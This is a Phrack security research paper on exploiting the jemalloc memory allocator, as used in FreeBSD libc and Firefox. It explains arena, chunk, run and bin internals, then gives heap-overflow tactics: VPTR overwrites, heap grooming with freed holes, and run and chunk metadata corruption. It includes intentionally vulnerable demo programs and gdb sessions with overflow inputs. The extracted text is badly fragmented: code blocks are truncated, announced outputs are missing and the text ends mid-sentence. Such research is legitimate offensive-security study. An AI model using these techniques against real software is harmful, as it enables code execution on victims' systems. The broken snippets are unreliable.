p68 0x0a Pseudomonarchia Jemallocum by Argp Huku
p68 0x0a Pseudomonarchia Jemallocum by Argp Huku
==
|=-----------------------------------------------------------------------=|
|=-------------------=[ Pseudomonarchia jemallocum ]=--------------------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ The false kingdom of jemalloc, or ]=------------------|
|=-----------=[ On exploiting the jemalloc memory manager ]=-------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ argp | huku ]=------------------------=|
|=--------------------=[ {argp,huku}@grhack.net ]=---------------------=|
|=-----------------------------------------------------------------------=|
1 - Introduction
1.1 - Thousand-faced jemalloc
2 - jemalloc memory allocator overview
2.1 - Basic structures
2.1.1 - Chunks (arena_chunk_t)
2.1.2 - Arenas (arena_t)
2.1.3 - Runs (arena_run_t)
2.1.4 - Regions/Allocations
2.1.5 - Bins (arena_bin_t)
2.1.6 - Huge allocations
2.1.7 - Thread caches (tcache_t)
2.1.8 - Unmask jemalloc
2.2 - Algorithms
3 - Exploitation tactics
3.1 - Adjacent region corruption
3.2 - Heap manipulation
3.3 - Metadata corruption
3.3.1 - Run (arena_run_t)
3.3.2 - Chunk (arena_chunk_t)
3.3.3 - Thread caches (tcache_t)
4 - A real vulnerability
5 - Future work
6 - Conclusion
7 - References
8 - Code
--[ 1 - Introduction
All the above have led to a few versions of jemalloc that are very
similar but not exactly the same. To summarize, there are three different
widely used versions of jemalloc: 1) the standalone version [JESA],
2) the version in the Mozilla Firefox web browser [JEMF], and 3) the
FreeBSD libc [JEFB] version.
The exploitation vectors we investigate in this paper have been tested
on the jemalloc versions presented in subsection 1.1, all on the x86
platform. We assume basic knowledge of x86 and a general familiarity
with userland malloc() implementations, however these are not strictly
required.
There are so many different jemalloc versions that we almost went crazy
double checking everything in all possible platforms. Specifically, we
tested the latest standalone jemalloc version (2.2.3 at the time of this
writing), the version included in the latest FreeBSD libc (8.2-RELEASE),
and the Mozilla Firefox web browser version 11.0. Furthermore, we also
tested the Linux port of the FreeBSD malloc(3) implementation
(jemalloc_linux_20080828a in the accompanying code archive) [JELX].
Before we start our analysis we would like to point out that jemalloc (as
well as other malloc implementations) does not implement concepts like
'unlinking' or 'frontlinking' which have proven to be catalytic for the
exploitation of dlmalloc and Microsoft Windows allocators. That said, we
would like to stress the fact that the attacks we are going to present do
not directly achieve a write-4-anywhere primitive. We, instead, focus on
how to force malloc() (and possibly realloc()) to return a chunk that will
most likely point to an already initialized memory region, in hope that
the region in question may hold objects important for the functionality
of the target application (C++ VPTRs, function pointers, buffer sizes and
so on). Considering the various anti-exploitation countermeasures present
in modern operating systems (ASLR, DEP and so on), we believe that such
an outcome is far more useful for an attacker than a 4 byte overwrite.
Chunk #0 Chunk #1
.--------------------------------. .--------------------------------.
| | | |
| Run #0 Run #1 | | Run #0 Run #1 |
| .-------------..-------------. | | .-------------..-------------. |
| | || | | | | || | |
| | Page || Page | | | | Page || Page | |
| | .---------. || .---------. | | | | .---------. || .---------. | |
| | | | || | | | | | | | | || | | | | ...
| | | Regions | || | Regions | | | | | | Regions | || | Regions | | |
| | |[] [] [] | || |[] [] [] | | | | | |[] [] [] | || |[] [] [] | | |
| | | ^ ^ | || | | | | | | | ^ ^ | || | | | |
| | `-|-----|-' || `---------' | | | | `-|-----|-' || `---------' | |
| `---|-----|---'`-------------' | | `---|-----|---'`-------------' |
`-----|-----|--------------------' `-----|-----|--------------------'
| | | |
| | | |
.---|-----|----------. .---|-----|----------.
| | | | | | | |
| free regions' tree | ... | free regions' tree | ...
| | | |
`--------------------' `--------------------'
bin[Chunk #0][Run #0] bin[Chunk #1][Run #0]
If you are familiar with Linux heap exploitation (and more precisely with
dlmalloc internals) you have probably heard of the term 'chunk' before. In
dlmalloc, the term 'chunk' is used to denote the memory regions returned
by malloc(3) to the end user. We hope you get over it soon because when it
comes to jemalloc the term 'chunk' is used to describe big virtual memory
regions that the memory allocator conceptually divides available memory
into. The size of the chunk regions may vary depending on the jemalloc
variant used. For example, on FreeBSD 8.2-RELEASE, a chunk is a 1 MB region
(aligned to its size), while on the latest FreeBSD (in CVS at the time of
this writing) a jemalloc chunk is a region of size 2 MB. Chunks are the
highest abstraction used in jemalloc's design, that is the rest of the
structures described in the following paragraphs are actually placed within
a chunk somewhere in the target's memory.
The following are the chunk sizes in the jemalloc variants we have
examined:
+---------------------------------------+
| jemalloc variant | Chunk size |
+---------------------------------------+
| FreeBSD 8.2-RELEASE | 1 MB |
-----------------------------------------
| Standalone v2.2.3 | 4 MB |
-----------------------------------------
| jemalloc_linux_20080828a | 1 MB |
-----------------------------------------
| Mozilla Firefox v5.0 | 1 MB |
-----------------------------------------
| Mozilla Firefox v7.0.1 | 1 MB |
-----------------------------------------
| Mozilla Firefox v11.0 | 1 MB |
-----------------------------------------
An area of jemalloc managed memory divided into chunks looks like the
following diagram. We assume a chunk size of 4 MB; remember that chunks are
aligned to their size. The address 0xb7000000 does not have a particular
significance apart from illustrating the offsets between each chunk.
+-------------------------------------------------------------------------+
| Chunk alignment | Chunk content |
+-------------------------------------------------------------------------+
| Chunk #1 starts at: 0xb7000000 [ Arena ]
| Chunk #2 starts at: 0xb7400000 [ Arena ]
| Chunk #3 starts at: 0xb7800000 [ Arena ]
| Chunk #4 starts at: 0xb7c00000 [ Arena ]
| Chunk #5 starts at: 0xb8000000 [ Huge allocation region, see below ]
| Chunk #6 starts at: 0xb8400000 [ Arena ]
| Chunk #7 starts at: 0xb8800000 [ Huge allocation region ]
| Chunk #8 starts at: 0xb8c00000 [ Huge allocation region ]
| Chunk #9 starts at: 0xb9000000 [ Arena ]
+-------------------------------------------------------------------------+
Huge allocation regions are memory regions managed by jemalloc chunks that
satisfy huge malloc(3) requests. Apart from the huge size class, jemalloc
also has the small/medium and large size classes for end user allocations
(both managed by arenas). We analyze jemalloc's size classes of regions in
subsection 2.1.4.
[2-1]
/*
* Whether this chunk contained at some point one or more dirty pages.
*/
bool dirtied;
/*
* A chunk map element corresponds to a page of this chunk. The map
* keeps track of free and large/small regions.
*/
arena_chunk_map_t map[];
};
The main use of chunk maps in combination with the memory alignment of the
chunks is to enable constant time access to the management metadata of free
and large/small heap allocations (regions).
Arenas are the central jemalloc data structures as they are used to manage
the chunks (and the underlying pages) that are responsible for the small
and large allocation size classes. Specifically, the arena structure is
defined as follows:
[2-2]
/*
* Each arena has a spare chunk in order to cache the most recently
* freed chunk.
*/
arena_chunk_t *spare;
/*
* Ordered tree of this arena's available clean runs, i.e. runs
* associated with clean pages.
*/
arena_avail_tree_t runs_avail_clean;
/*
* Ordered tree of this arena's available dirty runs, i.e. runs
* associated with dirty pages.
*/
arena_avail_tree_t runs_avail_dirty;
/*
* Bins are used to store structures of free regions managed by this
* arena.
*/
arena_bin_t bins[];
};
arena_t **arenas;
unsigned narenas;
The main responsibility of a run is to keep track of the state (i.e. free
or used) of end user memory allocations, or regions as these are called in
jemalloc terminology. Each run holds regions of a specific size (however
within the small and large size classes as we have mentioned) and their
state is tracked with a bitmask. This bitmask is part of a run's metadata;
these metadata are defined with the following structure:
[2-3]
/*
* The index of the next region of the run that is free. On the FreeBSD
* and Firefox flavors of jemalloc this variable is named regs_minelm.
*/
uint32_t nextind;
/*
* Bitmask for the regions in this run. Each bit corresponds to one
* region. A 0 means the region is used, and an 1 bit value that the
* corresponding region is free. The variable nextind (or regs_minelm
* on FreeBSD and Firefox) is the index of the first non-zero element
* of this array.
*/
unsigned regs_mask[];
};
In jemalloc the term 'regions' applies to the end user memory areas
returned by malloc(3). As we have briefly mentioned earlier, regions are
divided into three classes according to their size, namely a) small/medium,
b) large and c) huge.
Huge regions are considered those that are bigger than the chunk size minus
the size of some jemalloc headers. For example, in the case that the chunk
size is 4 MB (4096 KB) then a huge region is an allocation greater than
4078 KB. Small/medium are the regions that are smaller than a page. Large
are the regions that are smaller than the huge regions (chunk size minus
some headers) and also larger than the small/medium regions (page size).
Huge regions have their own metadata and are managed separately from
small/medium and large regions. Specifically, they are managed by a
global to the allocator red-black tree and they have their own dedicated
and contiguous chunks. Large regions have their own runs, that is each
large allocation has a dedicated run. Their metadata are situated on
the corresponding arena chunk header. Small/medium regions are placed
on different runs according to their specific size. As we have seen in
2.1.3, each run has its own header in which there is a bitmask array
specifying the free and the used regions in the run.
In the standalone flavor of jemalloc the smallest run is that for regions
of size 4 bytes. The next run is for regions of size 8 bytes, the next
for 16 bytes, and so on.
Bins are used by jemalloc to store free regions. Bins organize the free
regions via runs and also keep metadata about their regions, like for
example the size class, the total number of regions, etc. A specific bin
may be associated with several runs, however a specific run can only be
associated with a specific bin, i.e. there is an one-to-many correspondence
between bins and runs. Bins have their associated runs organized in a tree.
Each bin has an associated size class and stores/manages regions of this
size class. A bin's regions are managed and accessed through the bin's
runs. Each bin has a member element representing the most recently used run
of the bin, called 'current run' with the variable name runcur. A bin also
has a tree of runs with available/free regions. This tree is used when the
current run of the bin is full, that is it doesn't have any free regions.
[2-4]
/*
* The current run of the bin that manages regions of this bin's size
* class.
*/
arena_run_t *runcur;
/*
* The tree of the bin's associated runs (all responsible for regions
* of this bin's size class of course).
*/
arena_run_tree_t runs;
/*
* The total size of a run of this bin. Remember that each run may be
* comprised of more than one pages.
*/
size_t run_size;
/*
* The total number of elements in the regs_mask array of a run of this
* bin. See 2.1.3 for more information on regs_mask.
*/
uint32_t regs_mask_nelms;
/*
* The offset of the first region in a run of this bin. This can be
* non-zero due to alignment requirements.
*/
uint32_t reg0_offset;
};
one = malloc(2);
two = malloc(8);
three = malloc(16);
Using gdb let's explore jemalloc's structures. First let's see the runs
that the above allocations created in their corresponding bins:
We can see that our three allocations of sizes 2, 8 and 16 bytes resulted
in jemalloc creating runs for these size classes. Specifically, 'bin[0]'
is responsible for the size class 2 and its current run is at 0xb7d01000,
'bin[1]' is responsible for the size class 4 and doesn't have a current
run since no allocations of size 4 were made, 'bin[2]' is responsible
for the size class 8 with its current run at 0xb7d02000, and so on. In the
code archive you can find a Python script for gdb named unmask_jemalloc.py
for easily enumerating the size of bins and other internal information in
the various jemalloc flavors (see 2.1.8 for a sample run).
.----------------------------------. .---------------------------.
.----------------------------------. | +--+-----> arena_chunk_t |
.---------------------------------. | | | | |
| arena_t | | | | | .---------------------. |
| | | | | | | | |
| .--------------------. | | | | | | arena_run_t | |
| | arena_chunk_t list |-----+ | | | | | | | |
| `--------------------' | | | | | | | .-----------. | |
| | | | | | | | | page | | |
| arena_bin_t bins[]; | | | | | | | +-----------+ | |
| .------------------------. | | | | | | | | region | | |
| | bins[0] ... bins[27] | | | | | | | | +-----------+ | |
| `------------------------' | | |.' | | | | region | | |
| | | |.' | | | +-----------+ | |
`-----+----------------------+----' | | | | region | | |
| | | | | +-----------+ | |
| | | | | . . . | |
| v | | | .-----------. | |
| .-------------------. | | | | page | | |
| | .---------------. | | | | +-----------+ | |
| | | arena_chunk_t |-+---+ | | | region | | |
| | `---------------' | | | +-----------+ | |
| [2-5] | .---------------. | | | | region | | |
| | | arena_chunk_t | | | | +-----------+ | |
| | `---------------' | | | | region | | |
| | . . . | | | +-----------+ | |
| | .---------------. | | | | |
| | | arena_chunk_t | | | `---------------------' |
| | `---------------' | | [2-6] |
| | . . . | | .---------------------. |
| `-------------------' | | | |
| +----+--+---> arena_run_t | |
| | | | | |
+----------+ | | | .-----------. | |
| | | | | page | | |
| | | | +-----------+ | |
| | | | | region | | |
v | | | +-----------+ | |
.--------------------------. | | | | region | | |
| arena_bin_t | | | | +-----------+ | |
| bins[0] (size 8) | | | | | region | | |
| | | | | +-----------+ | |
| .----------------------. | | | | . . . | |
| | arena_run_t *runcur; |-+---------+ | | .-----------. | |
| `----------------------' | | | | page | | |
`--------------------------' | | +-----------+ | |
| | | region | | |
| | +-----------+ | |
| | | region | | |
| | +-----------+ | |
| | | region | | |
| | +-----------+ | |
| | | |
| `---------------------' |
`---------------------------'
Huge allocations are not very interesting for the attacker but they are an
integral part of jemalloc which may affect the exploitation process. Simply
put, huge allocations are represented by 'extent_node_t' structures that
are ordered in a global red black tree which is common to all threads.
[2-7]
/* Tree of extents. */
typedef struct extent_node_s extent_node_t;
struct extent_node_s {
#ifdef MALLOC_DSS
/* Linkage for the size/address-ordered tree. */
rb_node(extent_node_t) link_szad;
#endif
malloc_mutex_lock(&huge_mtx);
extent_tree_ad_insert(&huge, node);
The most interesting thing about huge allocations is the fact that free
base nodes are kept in a simple array of pointers called 'base_nodes'. The
aforementioned array, although defined as a simple pointer, it's handled
as if it was a two dimensional array holding pointers to available base
nodes.
static extent_node_t *
base_node_alloc(void)
{
extent_node_t *ret;
malloc_mutex_lock(&base_mtx);
if (base_nodes != NULL) {
ret = base_nodes;
base_nodes = *(extent_node_t **)ret;
...
}
...
}
static void
base_node_dealloc(extent_node_t *node)
{
malloc_mutex_lock(&base_mtx);
*(extent_node_t **)node = base_nodes;
base_nodes = node;
...
}
1) A multicore system is the reason jemalloc allocates more than one arena.
On a unicore system there's only one available arena, even on multithreaded
applications. However, the Firefox jemalloc variant has just one arena
hardcoded, therefore it has no thread caches.
void *
arena_malloc(arena_t *arena, size_t size, bool zero)
{
...
In this section we will analyze thread magazines, but the exact same
principles apply on the tcaches (the change in the nomenclature is probably
the most notable difference between them).
The following figure depicts the relationship between the various thread
magazines' structures.
.-------------------------------------------.
| mag_rack_t |
| |
| bin_mags_t bin_mags[]; |
| |
| .-------------------------------------. |
| | bin_mags[0] ... bin_mags[nbins - 1] | |
| `-------------------------------------' |
`--------|----------------------------------'
|
| .------------------.
| +----------->| mag_t |
v | | |
.----------------------. | | void *rounds[] |
| bin_mags_t | | | ... |
| | | `------------------'
| .----------------. | |
| | mag_t *curmag; |-----------+
| `----------------' |
| ... |
`----------------------'
/*
* Magazines are lazily allocated, but once created, they remain until the
* associated mag_rack is destroyed.
*/
typedef struct bin_mags_s bin_mags_t;
struct bin_mags_s {
mag_t *curmag;
mag_t *sparemag;
};
void
mag_load(mag_t *mag)
{
arena_t *arena;
arena_bin_t *bin;
arena_run_t *run;
void *round;
size_t i;
if (round == NULL)
break;
...
mag->nrounds = i;
}
/* Just return the next available void pointer. It points to one of the
* preallocated memory regions.
*/
void *
mag_alloc(mag_t *mag)
{
if (mag->nrounds == 0)
return (NULL);
mag->nrounds--;
return (mag->rounds[mag->nrounds]);
}
The most notable thing about magazines is the fact that 'rounds', the array
of void pointers, as well as all the related thread metadata (magazine
racks, magazine bins and so on) are allocated by normal calls to functions
'arena_bin_malloc_xxx()' ([3-23], [3-24]). This results in the thread
metadata lying around normal memory regions.
As we are sure you are all aware, since version 7.0, gdb can be scripted
with Python. In order to unmask and bring to light the internals of the
various jemalloc flavors, we have developed a Python script for gdb
appropriately named unmask_jemalloc.py. The following is a sample run of
the script on Firefox 11.0 on Linux x86 (edited for readability):
$ ./firefox-bin &
$ open firefox-11.0.app
...
Attaching to process 837
[New Thread 0x2003 of process 837]
[New Thread 0x2103 of process 837]
[New Thread 0x2203 of process 837]
[New Thread 0x2303 of process 837]
[New Thread 0x2403 of process 837]
[New Thread 0x2503 of process 837]
[New Thread 0x2603 of process 837]
[New Thread 0x2703 of process 837]
[New Thread 0x2803 of process 837]
[New Thread 0x2903 of process 837]
[New Thread 0x2a03 of process 837]
[New Thread 0x2b03 of process 837]
[New Thread 0x2c03 of process 837]
[New Thread 0x2d03 of process 837]
[New Thread 0x2e03 of process 837]
Reading symbols from
/dbg/firefox-11.0.app/Contents/MacOS/firefox...done
Reading symbols from
/dbg/firefox-11.0.app/Contents/MacOS/firefox.dSYM/
Contents/Resources/DWARF/firefox...done.
0x00007fff8636b67a in ?? () from /usr/lib/system/libsystem_kernel.dylib
(gdb) source unmask_jemalloc.py
(gdb) unmask_jemalloc
MALLOC(size):
IF size CAN BE SERVICED BY AN ARENA:
IF size IS SMALL OR MEDIUM:
bin = get_bin_for_size(size)
bit = get_first_set_bit(run->regs_mask)
region = get_region(run, bit)
CALLOC(n, size):
RETURN MALLOC(n * size)
FREE(addr):
IF addr IS NOT EQUAL TO THE CHUNK IT BELONGS:
IF addr IS A SMALL ALLOCATION:
run = get_run_addr_belongs_to(addr);
bin = run->bin;
size = bin->reg_size;
element = get_element_index(addr, run, bin)
unset_bit(run->regs_mask[element])
The main idea behind adjacent heap item corruptions is that you exploit the
fact that the heap manager places user allocations next to each other
contiguously without other data in between. In jemalloc regions of the same
size class are placed on the same bin. In the case that they are also
placed on the same run of the bin then there are no inline metadata between
them. In 3.2 we will see how we can force this, but for now let's assume
that new allocations of the same size class are placed in the same run.
one = malloc(0x10);
memset(one, 0x41, 0x10);
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
two = malloc(0x10);
memset(two, 0x42, 0x10);
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
three = malloc(0x10);
memset(three, 0x43, 0x10);
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
[3-1]
[3-2]
free(one);
free(two);
free(three);
[3-3]
Examining the above we can see that region 'one' is at 0xb7003030 and that
the following two allocations (regions 'two' and 'three') are in the same
run immediately after 'one' and all three next to each other without any
metadata in between them. After the overflow of 'two' with 30 'X's we can
see that region 'three' has been overwritten with 14 'X's (30 - 16 for the
size of region 'two').
At breakpoint [3-1]:
At 0xb7003000 is the current run of the bin bins[2] that manages the size
class 16 in the standalone jemalloc flavor that we have linked against.
Let's take a look at the run's contents:
After some initial metadata (the run's header which we will see in more
detail at 3.3.1) we have region 'one' at 0xb7003030 followed by regions
'two' and 'three', all of size 16 bytes. Again we can see that there are no
metadata between the regions. Continuing to breakpoint [3-2] and examining
again the contents of the run:
We can see that our 30 'X's (0x58) have overwritten the complete 16 bytes
of region 'two' at 0xb7003040 and continued for 15 bytes (14 plus a NULL
from strcpy(3)) in region 'three' at 0xb7003050. From this memory dump it
should be clear why the printf(3) call of region 'one' after the overflow
continues to print all 46 bytes (16 from region 'one' plus 30 from the
overflow) up to the NULL placed by the strcpy(3) call. As it has been
demonstrated by Peter Vreugdenhil in the context of Internet Explorer heap
overflows [PV10], this can lead to information leaks from the region that
is adjacent to the region with the string whose terminating NULL has been
overwritten. You just need to read back the string and you will get all
data up to the first encountered NULL.
We can see that jemalloc does not clear the freed regions. This behavior of
leaving stale data in regions that have been freed and can be allocated
again can lead to easier exploitation of use-after-free bugs (see next
section).
class base
{
private:
char buf[32];
public:
void
copy(const char *str)
{
strcpy(buf, str);
}
virtual void
print(void)
{
printf("buf: 0x%08x: %s\n", buf, buf);
}
};
void
print(void)
{
printf("[+] derived_a: ");
base::print();
}
};
void
print(void)
{
printf("[+] derived_b: ");
base::print();
}
};
int
main(int argc, char *argv[])
{
base *obj_a;
base *obj_b;
if(argc == 3)
{
printf("[+] overflowing from obj_a into obj_b\n");
obj_a->copy(argv[1]);
obj_b->copy(argv[2]);
obj_a->print();
obj_b->print();
return 0;
}
$ gdb vuln-vptr
...
gdb $ r `python -c 'print "A" * 48'` `python -c 'print "B" * 10'`
...
0x804862f <main(int, char**)+15>: movl $0x24,(%esp)
0x8048636 <main(int, char**)+22>: call 0x80485fc <_Znwj@plt>
0x804863b <main(int, char**)+27>: movl $0x80489e0,(%eax)
gdb $ print $eax
$13 = 0xb7c01040
At 0x8048636 we can see the first 'new' call which takes as a parameter the
size of the object to create, that is 0x24 or 36 bytes. C++ will of course
use jemalloc to allocate the required amount of memory for this new object.
After the call instruction, EAX has the address of the allocated region
(0xb7c01040) and at 0x804863b the value 0x80489e0 is moved there. This is
the VPTR that points to 'print(void)' of 'obj_a':
Our run is at 0xb7c01000 and the bin is bin[5] which handles regions of
size 0x30 (48 in decimal). Since our objects are of size 36 bytes they
don't fit in the previous bin, i.e. bin[4], of size 0x20 (32). We can see
'obj_a' at 0xb7c01040 with its VPTR (0x080489e0) and 'obj_b' at 0xb7c01070
with its own VPTR (0x080489f0).
Our next breakpoint is after the overflow of 'obj_a' into 'obj_b' and just
before the first call of 'print()'. Our run now looks like the following:
The following step is to deallocate every second region in this last series
of controlled victim allocations. This will create holes in between the
victim objects/structures on the run of the size class we are trying to
manipulate. Finally, we trigger the heap overflow bug forcing, due to the
state we have arranged, jemalloc to place the vulnerable objects in holes
on the target run overflowing into the victim objects.
char *foo[NALLOC];
char *bar[NALLOC];
jemalloc's behavior can be observed in the output, remember that our target
size class is 16 bytes:
$ ./test-holes
step 1: controlled allocations of victim objects
foo[0]: 0x40201030
foo[1]: 0x40201040
foo[2]: 0x40201050
foo[3]: 0x40201060
foo[4]: 0x40201070
foo[5]: 0x40201080
foo[6]: 0x40201090
foo[7]: 0x402010a0
...
foo[447]: 0x40202c50
foo[448]: 0x40202c60
foo[449]: 0x40202c70
foo[450]: 0x40202c80
foo[451]: 0x40202c90
foo[452]: 0x40202ca0
foo[453]: 0x40202cb0
foo[454]: 0x40202cc0
foo[455]: 0x40202cd0
foo[456]: 0x40202ce0
foo[457]: 0x40202cf0
foo[458]: 0x40202d00
foo[459]: 0x40202d10
foo[460]: 0x40202d20
...
We can see that jemalloc works in a FIFO way; the first region freed is the
first returned for a subsequent allocation request. Although our example
mainly demonstrates how to manipulate the jemalloc heap to exploit adjacent
region corruptions, our observations can also help us to exploit
use-after-free vulnerabilities. When our goal is to get data of our own
choosing in the same region as a freed region about to be used, jemalloc's
FIFO behavior can he help us place our data in a predictable way.
In the above discussion we have implicitly assumed that we can make
arbitrary allocations and deallocations; i.e. that we have available in
our exploitation tool belt allocation and deallocation primitives for
our target size. Depending on the vulnerable application (that relies
on jemalloc) this may or may not be straightforward. For example, if
our target is a media player we may be able to control allocations by
introducing an arbitrary number of metadata tags in the input file. In
the case of Firefox we can of course use Javascript to implement our
heap primitives. But that's the topic of another paper.
For release builds the 'magic' field will not be present (that is,
MALLOC_DEBUG is off by default). As we have already mentioned, each
run contains a pointer to the bin whose regions it contains. The 'bin'
pointer is read and dereferenced from 'arena_run_t' (see [2-3]) only
during deallocation. On deallocation the region size is unknown, thus the
bin index cannot be computed directly, instead, jemalloc will first find
the run the memory to be freed is located and will then dereference the
bin pointer stored in the run's header. From function 'arena_dalloc_small':
On the other hand, during the allocation process, once the appropriate run
is located, its 'regs_mask[]' bit vector is examined in search of a free
region. Note that the search for a free region starts at
'regs_mask[regs_minelm]' ('regs_minlem' holds the index of the first
'regs_mask[]' element that has nonzero bits). We will exploit this fact to
force 'malloc()' return an already allocated region.
Let's first have a look at how the in-memory model of a run looks like
(file test-run.c):
char *first;
breakpoint();
free(first);
The call to malloc() returns the address 0x28201030 which belongs to the
run at 0x28201000.
Oki doki, run 0x28201000 services the requests for memory regions of size
16 as indicated by the 'reg_size' value of the bin pointer stored in the
run header (notice that run->bin->runcur == run).
Now let's proceed with studying a scenario that can lead to 'malloc()'
exploitation. For our example let's assume that the attacker controls
a memory region 'A' which is the last in its run.
In the simple diagram shown above, 'R' stands for a normal region which may
or may not be allocated while 'A' corresponds to the region that belongs to
the attacker, i.e. it is the one that will be overflown. 'A' does not
strictly need to be the last region of run #1. It can also be any region of
the run. Let's explore how from a region on run #1 we can reach the
metadata of run #2 (file test-runhdr.c, also see [2-6]):
one = malloc(0x10);
memset(one, 0x41, 0x10);
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
two = malloc(0x10);
memset(two, 0x42, 0x10);
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
three = malloc(0x20);
memset(three, 0x43, 0x20);
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
__asm__("int3");
__asm__("int3");
At the first breakpoint we can see that for size 16 the run is at
0xb7d01000 and for size 32 the run is at 0xb7d02000:
gdb $ r
[Thread debugging using libthread_db enabled]
[+] region one: 0xb7d01030: AAAAAAAAAAAAAAAA
[+] region two: 0xb7d01040: BBBBBBBBBBBBBBBB
[+] region three: 0xb7d02020: CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
We can see that the run's metadata and specifically the address of the
'bin' element (see [2-3]) has been overwritten. One way or the other, the
attacker will be able to alter the contents of run #2's header, but once
this has happened, what's the potential of achieving code execution?
A careful reader would have already thought the obvious; one can overwrite
the 'bin' pointer to make it point to a fake bin structure of his own.
Well, this is not a good idea because of two reasons. First, the attacker
needs further control of the target process in order to successfully
construct a fake bin header somewhere in memory. Secondly, and most
importantly, as it has already been discussed, the 'bin' pointer of a
region's run header is dereferenced only during deallocation. A careful
study of the jemalloc source code reveals that only 'run->bin->reg0_offset'
is actually used (somewhere in 'arena_run_reg_dalloc()'), thus, from an
attacker's point of view, the bin pointer is not that interesting
('reg0_offset' overwrite may cause further problems as well leading to
crashes and a forced interrupt of our exploit).
if(argc < 2)
{
printf("%s <offset>\n", argv[0]);
return 0;
}
...
i = run->regs_minelm;
mask = run->regs_mask[i]; /* [3-4] */
if (mask != 0) {
/* Usable allocation found. */
bit = ffs((int)mask) - 1; /* [3-5] */
...
}
~$ gdb ./vuln-run
GNU gdb 6.1.1 [FreeBSD]
...
(gdb) run -2
Starting program: vuln-run -2
Allocating a chunk of 16 bytes just for fun
one = 0x28202030
Allocating first chunk of 32 bytes
two = 0x28203020
Performing more 32 byte allocations
...
temp = 0x28203080
...
Setting up a run for the next size class
three = 0x28204040
Notice how the memory region numbered 'four' (64 bytes) points exactly
where the chunk named 'temp' (32 bytes) starts. Voila :)
------[ 3.3.2 - Chunk (arena_chunk_t)
Before continuing with our analysis, let's set the foundations of the
test case we will cover.
[[Arena #1 header][R...R][C...C]]
The low level function responsible for allocating memory pages (called
'pages_map()'), is used by 'chunk_alloc_mmap()' in a way that makes it
possible for several distinct arenas (and any possible arena extensions)
to be physically adjacent. So, once the attacker requests a bunch of
new allocations, the memory layout may resemble the following figure.
/* [3-8] */
print_arena_chunk(base2);
/* [3-9] */
/* Allocate one more region right after the first region of the
* new chunk. This is done for demonstration purposes only.
*/
p2 = malloc(16);
/* [3-10] */
if(argc > 1) {
if((fd = open(argv[1], O_RDONLY)) > 0) {
/* Read the contents of the given file. We assume this file
* contains the exploitation vector.
*/
memset(buffer, 0, sizeof(buffer));
l = read(fd, buffer, sizeof(buffer));
close(fd);
/* [3-11] */
/* [3-12] */
/* [3-13] */
Before going further, the reader is advised to read the comments and the
code above very carefully. You can safely ignore 'print_arena_chunk()'
and 'print_region()', they are defined in the file lib.h found in the code
archive and are used for debugging purposes only. The snippet is actually
split in 6 parts which can be distinguished by their corresponding '[3-x]'
tags. Briefly, in part [3-8], the vulnerable program performs a number
of allocations in order to fill up the available space served by the
first arena. This emulates the fact that an attacker somehow controls
the order of allocations and deallocations on the target, a fair and
very common prerequisite. Additionally, the last call to 'malloc()'
(the one before the while loop breaks) forces jemalloc to allocate a new
arena chunk and return the first available memory region. Part [3-9],
performs one more allocation, one that will lie next to the first (that
is the second region of the new arena). This final allocation is there
for demonstration purposes only (check the comments for more details).
Part [3-10] is where the actual overflow takes place and part [3-11]
calls 'free()' on one of the regions of the newly allocated arena. Before
explaining the rest of the vulnerable code, let's see what's going on when
'free()' gets called on a memory region.
void
free(void *ptr)
{
...
if (ptr != NULL) {
...
idalloc(ptr);
}
}
static void
arena_dalloc_large(arena_t *arena, arena_chunk_t *chunk, void *ptr)
{
malloc_spin_lock(&arena->lock);
...
size_t pageind = ((uintptr_t)ptr - (uintptr_t)chunk) >>
PAGE_SHIFT; /* [3-18] */
size_t size = chunk->map[pageind].bits & ~PAGE_MASK; /* [3-19] */
...
arena_run_dalloc(arena, (arena_run_t *)ptr, true);
malloc_spin_unlock(&arena->lock);
}
There are two important things to notice in the snippet above. The first
thing to note is the way 'pageind' is calculated. Variable 'ptr' points
to the start of the memory region to be free()'ed while 'chunk' is the
address of the corresponding arena chunk. For a chunk that starts at
e.g. 0x28200000, the first region to be given out to the user may start
at 0x28201030 mainly because of the overhead involving the metadata of
chunk, arena and run headers as well as their bitmaps. A careful reader
may notice that 0x28201030 is more than a page far from the start
of the chunk, so, 'pageind' is larger or equal to 1. It is for this
purpose that we are mostly interested in overwriting 'chunk->map[1]'
and not 'chunk->map[0]'. The second thing to catch our attention is
the fact that, at [3-19], 'size' is calculated directly from the 'bits'
element of the overwritten bitmap. This size is later converted to the
number of pages comprising it, so, the attacker can directly affect the
number of pages to be marked as free. Let's see 'arena_run_dalloc':
static void
arena_run_dalloc(arena_t *arena, arena_run_t *run, bool dirty)
{
arena_chunk_t *chunk;
size_t size, run_ind, run_pages;
...
chunk->ndirty += run_pages;
arena->ndirty += run_pages;
}
else {
...
}
chunk->map[run_ind].bits = size | (chunk->map[run_ind].bits &
PAGE_MASK);
chunk->map[run_ind+run_pages-1].bits = size |
(chunk->map[run_ind+run_pages-1].bits & PAGE_MASK);
...
}
Continuing with our analysis, one can see that at [3-20] the same
size that was calculated in 'arena_dalloc_large()' is now converted
to a number of pages and then all 'map[]' elements that correspond to
these pages are marked as dirty (notice that 'dirty' argument given
to 'arena_run_dalloc()' by 'arena_dalloc_large()' is always set to
true). The rest of the 'arena_run_dalloc()' code, which is not shown
here, is responsible for forward and backward coalescing of dirty
pages. Although not directly relevant for our demonstration, it's
something that an attacker should keep in mind while developing a real
life reliable exploit.
Last but not least, it's interesting to note that, since the attacker
controls the 'arena' pointer, the map elements that correspond to the
freed pages are inserted in the given arena's red black tree. This can be
seen at [3-22] where 'arena_avail_tree_insert()' is actually called. One
may think that since red-black trees are involved in jemalloc, she can
abuse their pointer arithmetics to achieve a '4bytes anywhere' write
primitive. We urge all interested readers to have a look at rb.h, the
file that contains the macro-based red black tree implementation used
by jemalloc (WARNING: don't try this while sober).
2) Overwrite the 'arena' pointer of arena B's chunk and make it point
to an already existing arena. The address of the very first arena of
a process (call it arena A) is always fixed since it's declared as
static. This will prevent the allocator from accessing a bad address
and eventually segfaulting.
3) Force or let the target application free() any chunk that belongs to
arena B. We can deallocate any number of pages as long as they are marked
